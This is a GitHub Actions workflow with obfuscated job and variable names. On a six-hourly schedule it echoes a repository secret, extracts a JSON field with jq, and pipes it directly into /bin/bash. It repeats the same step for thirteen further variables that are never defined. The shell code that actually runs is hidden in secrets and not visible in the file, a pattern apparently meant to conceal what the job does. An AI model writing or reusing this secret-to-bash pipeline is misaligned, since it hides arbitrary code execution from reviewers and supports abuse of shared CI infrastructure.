name: lingzunqianlz
on:
  workflow_dispatch:
  schedule:
    - cron: '17 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lingzunqianlz
        env:
          jz6: ${{ secrets.jz6 }}
        run: |
          echo $jz6 | jq -r .wkkms520 | /bin/bash
          echo $pyplu40 | jq -r .a8086 | /bin/bash
          echo $vdos86 | jq -r .avwu39 | /bin/bash
          echo $k004 | jq -r .bm3761 | /bin/bash
          echo $bjzk05 | jq -r .x8 | /bin/bash
          echo $q97317 | jq -r .fvfm20 | /bin/bash
          echo $w0267 | jq -r .vil459 | /bin/bash
          echo $fohdi0 | jq -r .aedy3173 | /bin/bash
          echo $nwq6 | jq -r .nw964 | /bin/bash
          echo $ij0 | jq -r .c376 | /bin/bash
          echo $hdsq8 | jq -r .ruofe0 | /bin/bash
          echo $tocn2433 | jq -r .xidc08 | /bin/bash
          echo $n5288 | jq -r .kolpr38 | /bin/bash
          echo $nzz0 | jq -r .yw311 | /bin/bash

